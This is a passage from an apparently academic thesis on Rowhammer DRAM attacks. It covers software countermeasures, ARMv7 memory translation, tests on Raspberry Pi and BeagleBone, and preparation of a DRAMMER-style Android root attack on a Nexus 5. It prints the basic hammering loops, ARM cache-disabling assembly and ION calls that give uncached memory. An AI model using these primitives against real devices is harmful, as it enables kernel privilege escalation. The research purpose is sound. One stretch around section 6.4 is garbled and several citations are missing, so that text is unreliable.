 Static Analysis The Static Code Analysis is a fully automated way to detect rowhammer. A tool in this direction is proposed at [85]. It is used to detect microarchitectural attacks by testing binary code before loading them into an app store. If the detection works the user cannot be attacked anymore. Also, Software-based performance counter has been used for analysis specific behaviour common in side-channel attacks such as using high-resolution timers or cache flush instructions at [86]. This countermeasure can be used to detect Rowhammer when it is based on finding a cache eviction sets (4.2.2) by detecting the use of high resolutions timers, necessary in the cache side-channel to find the set of addresses that fall at the same way of the cache. On the other hand, can be used to detect the clflush-based (4.2.1) rowhammer attacks by detecting the overuse of the CLFLUSH cache instruction.

 Monitoring If performance counters are available to detect typical parameters for rowhammer detection such as the number of cache hits and cache misses the attack can be detected and stop it before it is exploiting. Some of the countermeasure used to detect cache side-channel attacks rely on monitoring the number of cache hits and misses [87]. It could be used to detect the rowhammer attacks too when using cache eviction sets (4.2.2) for evicting the aggressor rows. Also, the

80

FLUSH+RELOAD loop of rowhammer can be detected by cache attack defences such as [88] that rely on hardware performance counters. ANVIL is a software-based countermeasure that uses CPU performance counter to monitor the amount of last-level cache misses and marks the addresses if the amount exceeds a predetermined threshold. When the predetermined threshold is exceeded the nearby memory rows are refreshed mitigating the rowhammer effect. It uses Intel PEBS to monitor the addresses of cache missing to distinguish Rowhammer attacks from legitimate workloads. ANVIL improves its performance, the row refresh imposes a performance penalty, by counting just access to two rows at the same bank. The specific approach let out of the detection the one-side hammering type allowing attack such as Another flip in the Wall [43] and Nethammer [62] to be used. The monitoring of access patterns relies on the fact that trigger rowhammer produces a large number of cache misses on one row and accumulative accesses on other rows in same DRAM bank. This approach is used at [89] to detect rowhammer and stopped before the bit flips. A new countermeasure has been proposed at [90] that detects the injected bit flip instead of predicting them from the beginning. They monitor DRAM banks memory accesses at runtime and the potentially vulnerable rows are inserted in a dynamic tree. The adjacency rows to the accesses ones are potentially vulnerable. They use a sliding windows protocol to monitor the access frequency to the same bank of the DRAM in a short interval. In this way, they achieve a reduction in the number of rows that need to be maintained by the tree. Their experiments confirmed that the framework enables rapid detection of the flip bits due to Rowhammer attacks.

 Preventing Physical Proximity Many of the Rowhammer attacks need to flip bits in kernel pages in order to take over the system. If the attackers cannot flip bits across security domains, the flip is meaningless in terms of impacts. A possible defence is to isolate physical memory to different domains and make sure that injected bit flips can only affect the attacker’s own memory region. G-CATT [91] extends the memory allocator to physically isolate the kernel and the userspace by leaving a gap between physical memory. This solution severely limits the capacity of the most part of System kernels to move physical memory between zones which alleviate memory pressure by making all possible resources available to an app or to the kernel itself. In addition, the app to app attacks are out of protection because to guarantee more than one domain increase a lot the complexity at the memory controller. A recent attack Another Flip on the Wall [43] have achieved to overpass G- CATT [91] by exploiting a flip bit at the opcode of shared sudo binary on the userspace. Also, double-ownership kernel buffers like video buffers allow the Still Hammerable [63] to effectively defeat CATT and gain both root and kernel privileges. The Google mitigations against DRAMMER [2] enforce the System heap return only memory pages from highmem, and not from the lowmen which contains the critical data structures. In practice, the attacker can allocate many ION chunks to deplete the highmem pool and force to be served from lowmem as they make on RAMpage attack [60]. Also, the highmem/lowmem separation suffers from the same issue describe before.

81

The GuardION defence [60] is a countermeasure against DMA-based Rowhammer exploit on mobile devices. They focus on limiting the capability of the attacker to affect out of the DMA region by isolated it with two guard rows, one at the top and another at the bottom of the DMA buffer. This enforces that bit flips triggered by uncached memory cannot occur outside of the DMA buffer boundary. The application of this countermeasure can avoid both DRAMMER [2] and RAMpage [60] attacks. The countermeasure presented in [59] against their own Throwhammer attack [59] is a Memory Allocator feature called ALIS. It aims to ensure that all accessible rows in an isolated buffer are separated from the rest of the system memory by at least one guard row to absorb the bit flip. The latest countermeasure has been presented in ZebRAM [92] to protect sensitive data for malicious exploits by isolating all data rows with guard rows that absorb bit flips.

 Memory Footprint The most part of the Rowhammmer attacks need to profile a large amount of memory for finding exploitable bit flips and almost exhaust the entire memory to place a page in a specific physical location. By default, the memory allocator avoids placed kernel pages close to user pages and only make it in near out-of-memory situations. If the Memory Allocator retrains exhausted memory usage and the OS kill the malicious process that consumes the entered memory, an attacker cannot force target pages to specific memory location anymore. The application of this countermeasure could evited attacks such as Rowhammer.js [3], DRAMMER [2], GoogleProject0 [45], Gitch [57] [58], Trowhammer [59], and RAMpage [60].

 Prevent the use of vulnerable locations B-CATT effectively removes the ability to inducing bit flips by forbidding the system to use the vulnerable pages of the DRAM. The bootloader runs a rowhammer test over the entire physical memory to identify vulnerable pages and marks it as unavailable, forcing the system to never use them. It is not a very practical solution because on a very vulnerable module a large amount of memory must be disable affecting the performance of the system. Also, memory fragmentation makes harder the apps that require contiguous memory to work correctly. In addition, the number of vulnerabilities location increase with the time [60], then disabling rows at boot time is not enough to avoid future vulnerabilities.

82

6 INVESTIGATION OF ROWHAMMER AT EMBEDDED SYSTEMS

6.1 ARM ARCHITECTURE The most widespread micro-architecture used on smartphones, tablets, and other embedded systems is based on the ARM family of instruction sets. It is a RISC (Reduced Instruction Set Computing) architecture configure with the aims of improving cost, power consumption and heat dissipation which are the desired characteristics for light, portable, battery power devices. The ARM holding develops the architecture and license to other companies, each company design their own implementation of the architecture for its products. The most part of the company’s product does not provide documentation for their specific ARM development which makes more difficult the implementation of microarchitectural attacks. Also, ARM does not provide instructions for fingerprint DRAM modules [2]. We base our attacks on the ARM architecture Reference Manual provide from ARM and the information available at the source code of the specific kernel. ARM provides three different architecture profiles: the ARM-A profile is intended for application use and it is provided as ARMv7 (32-bit) or ARMv8 (64-bit) architecture versions. Its main distinguished features are the use of MMU (Memory Management Unit) required from the most part of OS, and the paging technology. The ARM-R profile is an optimized version for hard real- time and safety-critical application. It is similar to the ARM-A but includes features such as MPU (Memory Protection Unit), non-overlapping memory regions and segmentation technology. The ARM-M profile is designed for use on microcontrollers, FPGAs and SoCs. At this study, we focus on ARMv-A architecture because is the most often used in Mobile Phones, Tablets as well as in Raspberry Pi. Specifically, we study the ARMv7-A version because its rowhammer vulnerability has been extended proved in previous researches [2]. A good memory management system is necessary, especially in embedded systems. The memory resources are limited needing better allocating and deallocating mechanisms. The ARM MMU (Memory Management Unit) controls address translations and access permissions using a set of address translations and associated memory properties holding held in memory mapped tables (Translation Tables). The translation Tables use a Short-descriptor translation table format that supports a memory map based on memory sections or pages: a super section that consists on 16MB of memory, sections of 1MB blocks of memory, large pages of 64kB, and small pages of 4kB. The sections and super sections page map large regions of memory using only a single level schema. But when pages blocks are using two-level scheme mapping for its page table structure are held in memory [93]. Figure 34 presents a schema that is a general view of the various kinds of memory map support on ARMv7-A architecture. The looking up address via in-memory page table is a one-step direct mapping for sections and two-step process if the entry refers to a page. With sections, the physical base address is stored in the page table entry of the first-level table. With pages, the page table entry contains the address of the second-level table.

83

Figure 34 Address translations using Short-description format translation table. Figure in [93]

ARM architecture provides different processor modes that have different privilege levels for each particular security state (Secure and Non-Secure state). At the PL0 state, the software is executed in User mode that is sometimes described as unprivileged execution. The Pln mode is associated with a particular privilege level n. The typical PL1&0 configuration runs kernel or user space respectively, the translations of the MMU can be split between two sets of translation tables. Each set is defined with TTBR0 and TTBR1 registers that hold the base addresses for the two sets of tables supporting the use of two simultaneous page table trees at the hardware level. The registers TTBR0, TTBR1, and TTBRC. The TTBRC (Translation Table Base Control Register) sets a split point in the address space. Addresses below the split point are mapped through the page tables pointed by TTBR0, and address above are mapped trough TTBR1. That division matches the memory split for user process and kernel. Then, the value of TTBR1 should never change because you want the kernel to be permanently mapped. On the other hand, TTBR0 is modified at every process-switch, it points to the page table of the current process. The typical Virtual Address division between TTBR0 and TTBR1 region for ARMv7 is shown in Figure 35.

Figure 35 Boundaries between TTBR0 and TTBR1 at commune ARMv7 configuration 84

The first level table entries for the section, super section, and page table schemes describe the mapping of the associated 1MB Memory Virtual Address. Figure 36 shows the possible first level descriptor formats associated with each kind of supported memory maps. The Page table base address descriptor gives the address of the second-level translation table, that specifies the mapping of the associated 1MB VA range, for the most common 4kB page map scheme.

Figure 36 First-level descriptor formats

Figure 37 shows the possible formats of a second-level descriptor. The small page base address points the first 20 bits of the physical memory address accessed.

Figure 37 Second-level descriptor formats

85

The four different map configuration types need of four possible virtual-to-physical address translations. That the architecture supports mapping blocks of several sizes does not mean that the operating system uses this capability. Generally, at ARMv7 based devices, the OS uses a small pages two-level hierarchy (4kB page size blocks are mapped and an entry in the first level table contains a pointer to second level tables). The top 12 bits of the 32-bits virtual address contain the offset into the first-level table in ARMv7 32-bits architectures. The next 8 bits contain the offset into the partial page table (256 entries per each partial table). The partial page table contains a 20-bit physical page address. The lowest 12 bits of the virtual address complete the physical address by offsetting the 4096 Bytes into the physical page Figure 38.

Figure 38 ARMv7 32-bits virtual address description

Thus, the hardware-wise two-level page table structure for 4kB mapped blocks have 4096 entries at first level and 256 entries at the second level. Each entry is one 32-bit word, then each 2-level page table is 1KB size [93]. Most bits in the second level entry are used by hardware, and there aren't any accessed and dirty bits to keep track of the accessed cache lines and the modify ones respectively. On the other hand, the Linux OS has a four-level page table structure (pdg, pud, pmd and pte) (2.7). Then, a mapping from the Linux page tables to the ARM hardware table must be made to fit on the two-level page table structure (pgd, pte). The method used depends on each kernel version and is described in the kernel source file arch/arm/include/asm/pgtable.h [94].

6.2 STUDY OF ROWHAMMER AT SINGLE-BOARD COMPUTERS The Single-Board Computers (SBC) integrate all the necessary computer features such as memory, microprocessor and, input/output in a single board. Are mostly used in embedded application and application for process control, like complex robotic and processor-intensive application. They have been considered an excellent alternative to microcontrollers too. The SBC is completely self-contained and its Architectural design is different from the standard desktops. They are available on a wide range of microprocessors, the most part of them are based on ARM architecture. At this section, we will study the characteristics of two of the most common SBC at the marker, Raspberry Pi [95] and BeagleBone [96], with the aim to understand if they could be vulnerable to the rowhammer issue. Both Raspberry Pi and BeagleBone are based on ARM architecture processor and each one provides various version board with different processors, features and, characteristics. The characteristics of the most recent version for each one are summarized in Table 12 and Table 13 respectively.

86

Raspberry Pi2 B Raspberry Pi3 B Raspberry Pi3 B+ Instruction Set ARMv7-A ARMv8-A ARMv8-A Word Width 32 bits 32/64 bits 32/64 bits SoC Broadcom BCM2836 Broadcom BCM2837 Broadcom BCM2837B0 CPU 4xCortex-A7 4xCortex-A53 4xCortex-A53 CPU frequency 900 MHz 1.2 GHz 1.4 GHz Memory (SDRAM) LPDDR2 (1GB) LPDDR2 (1GB) LPDDR2 (1GB) RI (refresh interval) 32ms 32ms 32ms Table 12 Most recently Raspberry Pi model specifications

BeagleBone Black BeagleBoard-X15 PocketBeagle Instruction Set ARMv8-A ARMv7-A ARMv8-A Word Width 32/64 bits 32 bits 32/64 bits SoC AM3358/9 Sitara AM5728 OSD3358-SM CPU Cortex-A8+ Dual ARM Cortex-A15+ AM3358 ARM Cortex-A8 Dual PRU Dual ARM M4 (212 MHz)+ Quad PRU (200 MHz) CPU frequency 1 GHz 1.5 GHz 1.0 GHz Memory (SDRAM) DDR3 (512 MiB) DDR3L (2048MiB) DDR3 (512 MiB) RI (refresh interval) 64ms 64ms 64ms Table 13 Most recently BeagleBone model specifications

We must identify if the RAM technology used at the device under study is vulnerable to rowhammer, considering current existing researches. Almost all DDR3 memories have been proved to be vulnerable to disturbance errors (3.2) which makes BBB platforms a perfect candidate for rowhammer vulnerability. Instead, the Rasberry Pi devices contain LPDDR2 memory types that are less vulnerable to the disturbance due to the lower cell density (3.2). Nevertheless, flip bits at Nexus 4 (LPDDR2 RAM) have been reported at DRAMMER studies [2] which lets the door open to the vulnerability at systems with the specific RAM. Each DRAM technology provides the specific retention time of the cells of the chip. Each DRAM module provides the RI (Refresh Interval) for the rows to guarantee correct data at the cells. As have been investigated in previous sections of this work (3.1) lowers values of RI typically guarantee a smaller number of flip bits. The Raspberry Pi DRAM modules require RI of 32ms which entail faster toggled to achieving the Nth (threshold Number of Activation) which may limit the ability to triggers the vulnerability. On the other hand, the specific DRAM module needs a lower RI value to guarantee the data retention because of their cells discharge faster which may involve lower Nth to trigger the vulnerability. In order to trigger rowhammer is not enough to use a vulnerable DRAM but also depends on the specific system characteristics of the device under attack. The most crucial characteristic to consider is the CPU frequency. The principal requirement for a successful rowhammer is to be able to activate rows fast enough to trigger the disturbance bug. This challenge is directly related to the CPU performance and the Memory Controller on each system [45]. The limited CPU performance of mobile devices was considered an obstacle to trigger the vulnerability until DRAMMER studies [2] proved that the double-side rowhammer technique could be used to

87 overpass the limitation. Then, the CPU limited performance on the single-board computers is not enough to discard the chance of triggering the rowhammer vulnerability on it. The main challenge to trigger rowhammer at vulnerable DRAM with enough CPU performance devices is to bypass the CPU caches to be able to make every access from physical memory. Aiming to check the rowhammer vulnerability on the Raspberry Pi we implement a module kernel that triggers double-side rowhammer by flushing the cache between memory accesses.

The Linux GCC provides a clear cache instruction __clear_cache to clean and invalidate a specific cache range in every level of the cache memory hierarchy. The specific implementation is different for each Linux Kernel. The source code for Raspbian kernel it is available at [97]. The arch/arm/mm/cache-v7.S file references an issue regarding the cleaning and invalidating data cache process. They propose to just invalidate the cache directly as a solution. The specific comment agrees with the results that we observed at our kernel module implementation. We were not able to successfully clear the cache in order to implement the rowhammer test. The ARM architecture supports sixteen coprocessors space to extend the ARM processor functionality. The CP15 Coprocessor is reserved by ARM for a specific purpose. It provides system control functionality including architecture and feature identification as well as control, status and configuration support. The ARMv7 manual describes that the CP15 register can be used to disable the different cache types. The SCTLR is the System Control Register section at CP15 that provides the top level control of the system, including its memory system is shown in Figure 39. In ARMv7 the SCTRL.C bit enables or disables all data and unified cache across all levels of cache visible to the processor. The SCTLR.I bit enable or disables all instruction caches, across all levels of cache visible to the processor Figure 40.

Figure 39 CP15 c1 System Control Register in VMSA implementation. Figure in [93]

Figure 40 Format of SCTLR register inARMV7-A implementation. Figure in [93]

88

Thus, the data cache can be disabled hypothetically by setting the SCTLR.C bit to 0 and the instruction cache by setting the SCTLR.I bit to 0. To perform this operation, we read the CP15 SCTLR control register, then clear the bit C and I and write again to the CP15 SCTRL. MRC p15, 0, r1, c1, c0, 0 BIC r1, r1, #(0x1 << 12) @ Disable Instruction cache BIC r1, r1, #(0x1 << 2) @ Disable Data cache MCR p15, 0, r1, c1, c0, 0 Our second try is based on the previous description; we aim to disable the cache to guarantee directly DRAM access. We add to the kernel source our own kernel call that disables the cache by setting the corresponding bits at the SCTLR register. Then, we cross compile the kernel including the new feature, that can be easily called from a module. The specific Linux call that hypothetically would provide the ability to disable the cache, in practice resulted in a kernel panic. The issue could be related to the fact that SCTLR is accessible only in privileged modes and some of the bits are related to not-configurable features provided just for compatibility with previous versions of the architecture. In addition, the defined reset value applies only to the Secure copy of the SCTLR when the Security Extension is implemented. On this case the system call set the non-banked read/write bits of the Non-secure copy of the register instead of the SCTLR register itself. In conclusion, we can remark that the specific Linux kernel used on Raspbian OS does not support every ARM feature which limits our theoretic approaches. The study of rowhammer vulnerability at Beagle Bone (BB) could be asserted in a different way. The Debian distribution for BB is compatible with the CMEM API library that manages blocks of contiguous physical memory. CMEM is a component of Linux Utils and can be configured by installing the provided kernel module (cmem.ko driver) develop by Texas Instruments [98] for OMAP3 DSP architectures, such as the one included in the Beagle Bone board. After installing the driver by using the insmod command, we are able to reserve a physically contiguous memory pool. Then a program that runs a rowhammer test could be implemented by accessing the specific memory pool. Note that this approach could not be used for Raspberry Pi due to the incompatibility of the specific Linux tool with the platform.

6.3 DRAMMER: DETERMINISTIC ROWHAMMER ATTACK ON MOBILE PLATFORMS DRAMMER is an attack on Android mobile platforms that exploits the Rowhammer hardware vulnerability in a deterministic fashion. It is an instance of the Flip Feng Shui (FFS) [42] technique that relies only on always-on commodity features and is called Phys Feng Shui [2]. The central idea is to exploit the hardware vulnerability for flip the bits and control deterministically the layout of physical memory to place the security-sensitive date in a vulnerable physical memory location. Both techniques have been published by VUSec (Systems and Network Security Group) at Vrije Universiteit Amsterdam as part of their Rowhammer vulnerability studies at the Hardware Vulnerability field [99]. The VUSec group [99] publishes on Github [100] at 2016 an open-source component for test the Android device vulnerability to the Rowhammer bug and an Android app at Google Play Store. The rowhammer vulnerability has been empirical proved on many ARMv7 32 bits architecture devices and some ARMv8 64bits by using the referenced implementation DRAMMER [2]. They

89 also illustrate an end-to-end Android root attack and explain the Phys Feng Shui massaging technique. It is relevant to note that their attack implementation code has not been published. Google reacts to this vulnerability playing the specific countermeasures on their new Android kernel versions (5.1). The countermeasures avoid the exploitation of the DRAMMER in Android from Version 6 but allow vulnerable the old Android versions. In addition, the VUSEc has recently published RAMpage [60], an improvement of their DRAMMER [2] attack that overpass the actual Google countermeasures. Our study regarding the rowhammer attacks for mobile platforms aims to implement our own rowhammer android root attack based on the Flip Feng Shui technique. Firstly, we analyze the ARM mobile architecture under attack making emphasis on the system’s details that are more relevant in the attack implementation. Secondly, we present the specific Software and Hardware characteristics for the specific Mobile devices under attack. Finally, we describe the phases of our Rowhammer attack implementation for Android 4.0 at LG Nexus 5.

6.3.1 Mobile Platforms Characteristics The specific characteristics of mobile devices make useless the attack primitives used at x86 architectures. The used hardware is mostly ARM processor with a slower ARM memory controller. And, the OS is in many cases Android, a more limited OS that implements just a subset of desktops features and server environments. The enough hammered frequency is achieved using the double-side rowhammer technique (3.2.1.2). The limited feature set is overpassing using the DMA buffer management APIs provided by the OS on Android/ARM. The common ARM family cores use on smartphones and tablets are the ARM-A profile. Our under attack device is an ARMv7-A architecture because has been proved to be very much vulnerable to the rowhammer at the DRAMMER paper [2]. Android is a Linux based Mobile OS developed by Google and designed primarily for touchscreen mobile devices such as tablets and smartphone. The Android kernel is a modified version of the Linux kernel LTS (Long Term Support) branches and depends on the individual devices. The Android’s variant of Linux kernel has further architectural changes outside the typical Linux kernel such as ashmem subsystem, pmem process, OOM (Out of Memory ) handler and ION components. The ashmem is a new shared memory allocator that support better low memory devices because it can discard shared memory units under memory pressure. The pmem process memory allocator uses physical contiguous memory to share between processes. The OOM handler simply kills processes as available memory becomes low. Finally, ION is a general memory manager introduced on Android 4.0 as a memory pool manager. The most important characteristics of ARMv7 Architectural and Android Kernel for implement the rowhammer attack are described in this section.

 Memory Allocation The ARM CPU can address a maximum of 4GB virtual memory address space, that must be shared between the kernel, user space processes, and hardware devices. The physical memory is divided into two zones. The Normal Zone and the High Zone by default.

90

Android, like any other Linux platform, manages physical memory via the buddy allocator (2.7). Normal Zone and High Zone are managed each one from a different instance of the buddy allocator algorithm [101].

 DMA Buffer Management API Modern computing mobile platforms need to support efficient memory sharing between their several different hardware components as well as between devices and user-land services. The device includes GPU, display controller, camera, encoders and sensors besides the CPU or System on Chip. Thus, the OS must provide allocators that support operations to physical contiguous memory pages since most devices need this kind of DMA (Direct Memory Access) performance (2.8.1). Often the DMA is just associated with the normal zone of the memory for the ARMv7 Architecture memory layout. The most complex Rowhammer attacks primitives, the uncached memory accesses to DRAM and the physical memory addressing to contiguous physical rows, can be solved exploiting the DMA tool.

 Android ION memory allocator ION is the generalized memory management that Google introduced in the Android 4.0 release to address the issue of fragmented memory management interface across different Android devices. It aims to replace and unifying the several memory management interfaces exposed by each hardware manufacturer. ION can manage caching shares via dma-buf (2.8.1) and work as a dma_buf exporter. Includes interfaces for both user space and kernel space drivers. It is not just a memory pool manager that provides allocation but also can enable its client to share buffers with various devices [102]. The DMA Buffer Management APIs allows userland apps to obtain uncached memory. ION presents its memory pools as ION heaps. A distinct set of ION heaps are provided on each different Android device according to their memory requirements. These heaps allocate memory at different memory locations and behave differently. The default ION driver offers three heaps but developers can choose to add more ION heaps. The default ION heaps are:

ION_HEAP_TYPE_SYSTEM: Memory allocated via vmalloc_user() pages.

ION_HEAP_TYPE_SYSTEM_CONTIG: Physical contiguous memory allocated via kmalloc(). ION_HEAP_TYPE_CARVEOUT: Region of memory permanently removed from the buddy alloca- tor. Is physical contiguous and set aside at boot. ION offers the /dev/ion interface for user-space programs to allocate and share buffers. Typically, userspace devices use ION to allocate large contiguous media buffers. A userspace c/c++ program must have granted access to the interface before can allocate memory. A call to open(“/dev/ion”, O_RDONLY)returns a file descriptor that represents the only ION client associated with the process.

To allocate a buffer, the client needs to fill in the following data structure, except the handle field that is an output parameter.

91

Struct ion_allocation_data{ size_t len; size_t align; unsigned int flags, struct ion_handle *handle; } The first three fields specify the alignment, length, and flags as input parameters. The flags field is a bit mask that indicates one or more ION heaps to allocated from.

The user-space clients interact with ION using ioctl()system call interface. The following call allocates the buffer and returns an ion_handle to manages it. int ioctl(ion_fd,ION_IOC_ALLOC, struct ion_allocation_da*allocation_data);

The ion_handle is not a CPU accessible buffer pointer and need to be converted to a file descriptor if we want to make buffers sharing or mapping to virtual memory. int ioctl(int client_fd, ION_IOC_SHARE, struct ion_fd_data *fd_data);

ION_IOC_SHARE generate the dma-buff and returns a file descriptor fd that reference via ion_fd_data structure. This can be used to share the buffer with other processes and to map it on virtual memory via mmap(). Whatever the more specific call ION_IOC_MAP could be more appropriated to map the buffer without sharing intentions.

To free the buffer firstly must undo the effect of mmap() with a call to munmap(), then close the file descriptor obtained via ION_IOC_SHARE by a call to close() and, finally make the specific system call ION_IOC_FREE. int ioctl(int client_fd, ION_IOC_FREE, struct ion_handle_data *handle_data)

The ion_handle_data holds the handle, the before system call decrements by one the reference counter that will destroy the ion_handle object and update the corresponding ION bookkeeping data structure when reach zero. Although ION was originally created for ARM 32 bits’ architectures from 2014 can be built and runs in different platforms such as x86_64 and ARM64.

 OOM Killer in Linux The Android behaviour on low memory conditions includes the OOM (Linux Out of Memory killer) that is much more predictable than other OS. Then, the kernel developers were pushing to include a Low Memory killer (LMK) to the kernel. The LMK handles the system low-memory conditions before the OOM killer is provoked. It tracks the shrinkers that have been registered by memory subsystems and drivers on the memory reservation from the RAM. If the System is close to running out of memory, the LMK calls the registered shrinkers to release and regain cached memory. The attacker implementation must be especially careful to not run out of memory during the massaging phase.

92

6.3.2 Device Under Attack In this section, we analyse the specific ARMv7 device subject of the attack implementation. It is essential to understand the hardware details and kernel version characteristics for the specific understudy system to can exploit success the flips bits that are triggered by rowhammer.

 Hardware Details The mobile device under study is the LG Nexus 5. Basic information related to the system is provided at the proc files system. The proc file system acts as an interface to internal data structures in the kernel. It can be used to obtain information about the system and to change certain kernel parameters at runtime. The /proc/cpuinfo provides the hardware SoC and the Architecture instruction set for the LG Nexus 5 finding the most important hardware components details summarized in Table 14. Characteristics Nexus 5 Device SoC (Processor model) Qualcomm MSM 8974 HAMMERHEAD Architecture Instruction set ARMv7-based (rev 0) Machine word width (32 bits) Processot Core(s) Quad-core 2,3GHz Krail 400 Data Structure matching data Flattened Device Tree (FDT) conf. Memory interface 2 GB LPDDR3 Embedded GPU Adreno 330 Table 14 General characteristics for the LG Nexus 5 device

6.4 THE QUALCOMM MSM8974 IS AN ARM-BASED SOC FOR TABLETS AND SMARTPHONES BUILT AT TSMC IN A 28NM HPM (HIGH-PERFORMANCE MOBILE). THE PROCESSOR INTEGRATES FOUR INDEPENDENTS UNITED (QUALCOMM KRAIT 400) WITH A CLOCK SPEED UP TO 2.3 GHZ. NOTE THAT QUALCOMM'S KRAIT ARCHITECTURE, WHICH IS COMPATIBLE WITH ARMV7 ISA IS INCLUDED IN SOME OF THE QUALCOMM TOP LINES CHIPSETS. THE ADRENO 330 GPU WORKS UP TO 450 MHZ AND THE LPDDR3 IS A LOWER POWER MEMORY KIND THAT BELOW By repeatedlyTO THE ROWHAMMER accessing, hammering, VTRIGGERING the ROWHAMMER same memory row (aggressor row) an attacker can cause enough disturbance in a neighbouring row (victim row) to cause a bit flip. This can be software triggering by using a code with a loop that generates millions of reads to two different DRAM rows of the same bank in each iteration. Memory access consists of different stages (2.5). In the ACTIVE stage, firstly a row is activated to transfer the data row to the bank’s row buffer by toggling ON its specific associated wordline. Secondly, the specific column from the row is read/written (READ/WRITE stage) from or to the row buffer. Finally, the row is closed, by pre-charging (PRECHARGE stage) the specific bank, writing back the value to the row and plugging OFF the wordline. The disturbance error is produced on a DRAM row when a nearby wordline voltage is toggled repeatedly, meaning that it is produced on the repeated ACTIVE/PRECHARGE of rows and not on the column READ/WRITE stage. The code must guarantee that each access corresponds to a new row activation in order to trigger rowhammer.

93

When the memory controller uses an open page policy (2.5) the recent access row is keeping open on a buffer on a try to reduce the ACTIVE and PRECHARGE commands if the same address is access continuously. Then, if the same physical address is accessed continuously, the corresponding data is already in the row buffer and no new activation is produced. Therefore, in this case, two physical addresses that correspond to rows on the same bank must be accessed to guarantee that the row buffer is clearing between memory access. A code to induce the disturbance at the real system, which is based on an open page memory controller policy, was firstly constructed at . They use a code with a loop that generates millions of reads to two different DRAM rows of the same bank in each iteration. It is designed to generate a read to DRAM on every data access. The code consists of two mov instructions that read data from DRAM at address X and Y and move into a register, two clflush instruction that evict both accessed data from the cache, a mfence instruction that ensures that the data is fully flushed before any subsequent memory instruction and finally the code jumps back to the first instruction for a new interaction. code: mov (X), %eax mov (Y), %ebx clflush (X) clflush (Y) mfence jmp code To guaranty the direct access to the DRAM two are the keys of the code:  The two consecutive mov instruction at two different DRAM address. If just one address is accessed on each loop the row is accessed directly from the row buffer which does not toggle the wireline avoiding the disturbance effect. The values of X and Y must be choosing correctly so that map different rows within the same bank to guarantee the eviction of the row buffer on each memory access.  It is necessary to flush the cache on each iteration to access directly the DRAM on each memory access. At the point of the study they just use a clflush command. On the other hand, recent studies have proposed a new rowhammer attack method for close page memory controller policies. The closed page policy (2.5) immediately close the row and precharge the bank to be ready for a new open row. In this case, it is not necessary to evict the row buffer to toggled the row then a simpler code can trigger the vulnerability: code: mov (X), %eax clflush (X) mfence jmp code

6.4.1 Rowhammer Types In this section its overview the different methods to hammer a vulnerable DRAM depending on their memory access pattern. A schematic that compares the three hammering patterns is shown

94 in Figure 18. The rows mark with a hammer are the hammered locations (aggressor rows) and the grey ones are the most like location to have bit flips (victim rows). Note that the way of conducting hammering affects the efficiency of flipping bits, so the method used on each case must be cautiously selected deepening on the attack environment.

Figure 18 Different hammering strategies. Figure in

Single-side rowhammer The attacks that rely on the activation of just one aggressor row is called single-side Rowhammer. The single side rowhammer approach has been used on probabilistic attacks. In this case, is enough to know the row size so that addresses on the same bank can be found . The X and Y values just need to map different rows within the same bank to be able to evict the row buffer and access directly the row at the RAM for systems with open page memory controller policy. Note that such a pattern just hammers the victim row from one side, which is generally flexible but slow. A challenge to consider is the need to finding physical addresses that are mappings on rows from the same bank (single-side rowhammer). Early projects confronted these challenges by picked random addresses following probabilistic approaches . If the single-sided hammering uses a set of unrelated addresses and accesses them a high frequency, the probability of two addresses map to the same channel, rank, and bank is lower than 1 , where C is the number of channels, R is the number of ranks, and B is the number of 퐶∙푅∙퐵 banks . Some attacks increase the efficiency of trigger bit flips finding out from before the rows that bellow to the same bank by using different techniques describe at section 4.1.2.

6.4.1.2 Double-side rowhammer The double-side rowhammer attack aims to improve the effectiveness of the attack in open page memory controller systems. The method targets a specific memory row and hammering its two neighbouring rows (two aggressor rows), the above and below of the victim row in the physical memory. It can guarantee a reproducible flip of a bit, on vulnerable DRAM memory, for specifically chosen victim address location . Such attacks require knowledge of the physical memory mapping in DRAMs to be able to identify the addresses of the neighbouring rows. The attack is mounted by carefully chose the X and Y values. X and Y addresses will correspond with the physical row above and below of the victim row at the DRAM. The physical address, the bits that correspond to each row, bank, DIMMs (Dual In-line Memory Module) and Memory channel have to comprehend to perform the deterministic double-side rowhammer . Note that these System specifications are commonly property close.

95

Double-side hammering is the most efficient way to perform rowhammer but more complex research regarding the memory architecture of the system under attack must be carried out in order to be able to choose correctly the 3 adjacent rows. In the double-side rowhammer attack, the exact physical address mapping of all the banks should be known to access both rows that are directly above and below the victim one .

6.4.1.3 One location hammering. The one-location hammering is a recent attack primitive presented in in 2018. This new technique hammers only one memory location; the attacker does not directly induce row conflicts to evict the row buffer but only re-opens one row permanently. It can be applying at the modern systems which employ most sophisticated memory controller policy (close page policy), that pre-emptively closing rows earlier than necessary, to optimize performance (2.5). With one- location hammering, the attacker only runs a Flush+Reload loop on a single X memory address at the maximum frequency. This continuously re-opens the same DRAM row, whenever the memory controller closes it. This method does not need any knowledge regarding the physical address mapping, not even need to find addresses at the same bank. The attack does not need to access different rows in the same bank which overpass the rowhammer defences based on the detection through analysis of memory access patterns (5.3) such as the propose in . On the other hand, although has been observed that one-location hammering drains enough charge from the DRAM cells to induce bit flips, the per cent of the bits that can be flip is lower than with double-sided and single-side hammering. The research in presents a comparison between the effectivity of the three rowhammer methods. They performed a test at Skylike i7-6700K with 8GB Crucial DDR4-2133 DIMMs that scans the per cent of bit flip during an attempt to hammer random memory locations. They compare the flip bit distribution over 4kB aligned memory regions between double-side hammering, single side hammering, and one-located hammering. It is observed that the flip bit offset is slightly more uniformed for single-side hammer (78.5%) than on double-side hammer (77%) and much worst at one-located hammer (36.5%). Usually, the one-located hammer type is weaker and slower than the other two types, but it is much stealthier as it requires no privileges. Vulnerable DRAM types (3.2).

 Build Properties The specific kernel version running on the devices is found out at the /proc/version system file. Also, the build.prop file is a system file that contains build properties and settings. Some of them are specific for the device manufacturer, others vary by OS version. We used to find more details properties for the specific build of the kernel such as ro.build.description and ro.build.fingerprint. It provides information such as the Build number, the Android version, and the ro.product.cpu.abi that reference the select ABI (Application Binary Interface) for the specific device. A summary of the most important Build properties at the devices under study is shown in Table 15. Different Android handsets use different CPUs, which in turn support different instruction sets. Each combination of CPU and instruction set has its own Application Binary Interface or ABI. The ABI defines, with great precision, how an application's machine code is supposed to interact with the system at runtime. The embedded-application binary interface (EABI) specifies standard

96 conventions for file formats, data types, register usage, stack frame organization, and function parameter passing of an embedded software program, for use with an embedded OS. Build Properties LG Nexus 5 Kernel version 3.4.0-gd59db4e gcc version 4.7 (GCC) Date Mon Mar 17 15:16:36 PDT 2014 ROM Build Version 4.4.4 Build Number KTU84Q Fingerprint google/hammerhead/hammer- head:4.4.4/KTU84Q/1253334:user/release-keys

